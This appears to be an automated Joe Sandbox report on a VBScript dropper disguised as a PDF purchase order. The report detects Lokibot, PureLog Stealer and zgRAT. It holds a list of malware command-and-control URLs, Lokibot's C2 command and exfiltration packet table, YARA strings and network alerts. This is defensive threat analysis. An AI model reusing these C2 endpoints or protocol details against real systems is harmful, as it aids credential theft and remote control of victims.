Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs

Overview

General Information

Sample name:#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs
renamed because original name is a hash value
Original sample name:-_(PO_460387320)_pdf.vbs
Analysis ID:1421256
MD5:055c0925042cb8d785f50c598449a755
SHA1:b9a1ef638c9f8445ee5f8d9536a752e85f6264a5
SHA256:262001fa47c949d07b1998343285eff24a6c5603f5d60946bee05728412bfe5a
Tags:vbs
Infos:

Detection

Lokibot, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Lokibot
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: AspNetCompiler Execution
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5140 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • x.exe (PID: 7020 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: F5259113B28AA9CB170D1D4C7003F79F)
      • aspnet_compiler.exe (PID: 1444 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
      • aspnet_compiler.exe (PID: 4596 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://altaskifer.sbs/PWS/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\x.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
      C:\Users\user\AppData\Local\Temp\x.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        C:\Users\user\AppData\Local\Temp\x.exeMALWARE_Win_zgRATDetects zgRATditekSHen
        • 0x11bff:$s1: file:///
        • 0x11b0d:$s2: {11111-22222-10009-11112}
        • 0x11b8f:$s3: {11111-22222-50001-00000}
        • 0x10300:$s4: get_Module
        • 0xf8f0:$s5: Reverse
        • 0xf604:$s6: BlockCopy
        • 0xf87b:$s7: ReadByte
        • 0x11c11:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
        SourceRuleDescriptionAuthorStrings
        00000002.00000000.2248791752.0000000000072000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000000.00000002.2257758604.000001A474030000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            00000000.00000003.2249190359.000001A4732E0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              00000004.00000002.3494407989.0000000000B48000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
                00000000.00000003.2249613824.000001A473A21000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  Click to see the 28 entries
                  SourceRuleDescriptionAuthorStrings
                  2.0.x.exe.70000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                    2.0.x.exe.70000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      2.0.x.exe.70000.0.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
                      • 0x11bff:$s1: file:///
                      • 0x11b0d:$s2: {11111-22222-10009-11112}
                      • 0x11b8f:$s3: {11111-22222-50001-00000}
                      • 0x10300:$s4: get_Module
                      • 0xf8f0:$s5: Reverse
                      • 0xf604:$s6: BlockCopy
                      • 0xf87b:$s7: ReadByte
                      • 0x11c11:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
                      0.2.wscript.exe.1a474030090.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        0.2.wscript.exe.1a474030090.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          Click to see the 41 entries

                          System Summary

                          barindex
                          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs", ProcessId: 5140, ProcessName: wscript.exe
                          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 7020, ParentProcessName: x.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 1444, ProcessName: aspnet_compiler.exe
                          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs", ProcessId: 5140, ProcessName: wscript.exe
                          Timestamp:04/06/24-09:29:38.036927
                          SID:2024318
                          Source Port:49740
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:36.488685
                          SID:2024318
                          Source Port:49737
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:53.641650
                          SID:2024318
                          Source Port:49835
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:51.314444
                          SID:2021641
                          Source Port:49832
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:13.652600
                          SID:2025381
                          Source Port:49784
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:53.641650
                          SID:2024313
                          Source Port:49835
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:38.861510
                          SID:2025381
                          Source Port:49818
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:48.957388
                          SID:2021641
                          Source Port:49829
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:50.516269
                          SID:2825766
                          Source Port:49831
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:36.488685
                          SID:2024313
                          Source Port:49737
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:28.779878
                          SID:2825766
                          Source Port:49803
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:31.907019
                          SID:2024313
                          Source Port:49807
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:29.547586
                          SID:2021641
                          Source Port:49804
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:05.124910
                          SID:2024313
                          Source Port:49773
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:19.370644
                          SID:2021641
                          Source Port:49865
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:02.814837
                          SID:2021641
                          Source Port:49770
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:48.181654
                          SID:2825766
                          Source Port:49828
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:21.669304
                          SID:2024313
                          Source Port:49868
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:34.204192
                          SID:2024313
                          Source Port:49810
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:31.907019
                          SID:2024318
                          Source Port:49807
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:23.961991
                          SID:2024313
                          Source Port:49871
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:59.690030
                          SID:2825766
                          Source Port:49766
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:18.590588
                          SID:2825766
                          Source Port:49864
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:00.493399
                          SID:2021641
                          Source Port:49767
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:28.699735
                          SID:2025381
                          Source Port:49723
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:34.204192
                          SID:2024318
                          Source Port:49810
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:42.736556
                          SID:2025381
                          Source Port:49821
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:21.669304
                          SID:2024318
                          Source Port:49868
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:54.422589
                          SID:2825766
                          Source Port:49836
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:11.610579
                          SID:2021641
                          Source Port:49857
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:38.799315
                          SID:2825766
                          Source Port:49741
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:17.895022
                          SID:2025381
                          Source Port:49789
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:25.641172
                          SID:2825766
                          Source Port:49799
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:44.242163
                          SID:2025381
                          Source Port:49748
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:56.595283
                          SID:2021641
                          Source Port:49762
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:23.961991
                          SID:2024318
                          Source Port:49871
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:46.592042
                          SID:2025381
                          Source Port:49826
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:17.815577
                          SID:2024318
                          Source Port:49863
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:34.860100
                          SID:2025381
                          Source Port:49731
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:57.593507
                          SID:2021641
                          Source Port:49840
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:17.815577
                          SID:2024313
                          Source Port:49863
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:21.735500
                          SID:2825766
                          Source Port:49794
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:41.891260
                          SID:2024318
                          Source Port:49745
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:20.970310
                          SID:2024318
                          Source Port:49793
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:35.705322
                          SID:2021641
                          Source Port:49734
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:41.891260
                          SID:2024313
                          Source Port:49745
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:53.470085
                          SID:2825766
                          Source Port:49758
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:38.036927
                          SID:2024313
                          Source Port:49740
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:24.862546
                          SID:2024313
                          Source Port:49798
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:37.260471
                          SID:2021641
                          Source Port:49739
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:24.862546
                          SID:2024318
                          Source Port:49798
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:30.251229
                          SID:2825766
                          Source Port:49725
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:58.128553
                          SID:2025381
                          Source Port:49764
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:37.305241
                          SID:2024313
                          Source Port:49815
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:10.531874
                          SID:2024318
                          Source Port:49778
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:27.203747
                          SID:2025381
                          Source Port:49801
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:35.733011
                          SID:2021641
                          Source Port:49812
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:37.305241
                          SID:2024318
                          Source Port:49815
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:06.739588
                          SID:2021641
                          Source Port:49775
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:05.891670
                          SID:2825766
                          Source Port:49774
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:20.970310
                          SID:2024313
                          Source Port:49793
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:55.035047
                          SID:2024318
                          Source Port:49760
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:42.690473
                          SID:2825766
                          Source Port:49746
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:24.825007
                          SID:2825766
                          Source Port:49872
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:10.531874
                          SID:2024313
                          Source Port:49778
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:40.344957
                          SID:2025381
                          Source Port:49743
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:49.735329
                          SID:2024318
                          Source Port:49830
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:43.454363
                          SID:2021641
                          Source Port:49747
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:49.735329
                          SID:2024313
                          Source Port:49830
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:32.673178
                          SID:2825766
                          Source Port:49808
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:07.768549
                          SID:2024313
                          Source Port:49851
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:34.079276
                          SID:2024313
                          Source Port:49729
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:34.975531
                          SID:2825766
                          Source Port:49811
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:34.079276
                          SID:2024318
                          Source Port:49729
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:45.799677
                          SID:2021641
                          Source Port:49750
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:15.463121
                          SID:2025381
                          Source Port:49862
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:07.768549
                          SID:2024318
                          Source Port:49851
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:58.921065
                          SID:2024313
                          Source Port:49765
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:33.293191
                          SID:2025381
                          Source Port:49728
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:58.921065
                          SID:2024318
                          Source Port:49765
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:29.470677
                          SID:2024318
                          Source Port:49724
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:27.986411
                          SID:2024313
                          Source Port:49802
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:29.470677
                          SID:2024313
                          Source Port:49724
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:38.088060
                          SID:2825766
                          Source Port:49816
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:05.124910
                          SID:2024318
                          Source Port:49773
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:05.441892
                          SID:2024318
                          Source Port:49848
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:39.580792
                          SID:2021641
                          Source Port:49742
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:27.986411
                          SID:2024318
                          Source Port:49802
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:26.328739
                          SID:2825766
                          Source Port:49720
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:55.812911
                          SID:2825766
                          Source Port:49761
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:05.441892
                          SID:2024313
                          Source Port:49848
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:02.332845
                          SID:2825766
                          Source Port:49844
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:51.920859
                          SID:2025381
                          Source Port:49756
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:01.546959
                          SID:2024318
                          Source Port:49843
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:23.194950
                          SID:2025381
                          Source Port:49870
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:55.035047
                          SID:2024313
                          Source Port:49760
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:25.556361
                          SID:2021641
                          Source Port:49719
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:24.081982
                          SID:2025381
                          Source Port:49797
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:06.206380
                          SID:2021641
                          Source Port:49849
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:52.865138
                          SID:2025381
                          Source Port:49834
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:01.546959
                          SID:2024313
                          Source Port:49843
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:41.966393
                          SID:2021641
                          Source Port:49820
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:46.581121
                          SID:2025381
                          Source Port:49751
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
